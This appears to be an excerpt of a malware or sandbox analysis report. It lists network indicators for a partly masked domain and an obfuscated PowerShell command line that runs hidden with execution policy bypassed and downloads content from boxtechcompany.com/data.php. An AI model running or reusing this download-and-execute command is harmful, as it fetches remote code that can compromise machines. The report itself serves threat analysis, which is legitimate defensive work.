Technical Information
- $yxjvagwjhheecbp
- 'bo####hcompany.com':443
- 'bo####hcompany.com':443
- DNS ASK bo####hcompany.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Ex Bypass -NoP -C $yXjVaGWjhhEeCBp='https://boxtechcompany.com/data.php?8675';$tGayxdkSRZOVGuZpDFizkTMzACt=(New-Object System.Net.WebClient).DownloadString($yXjVaGWjhhEeCBp);$dmDfkzgAxGUxqImTw...' (with hidden window)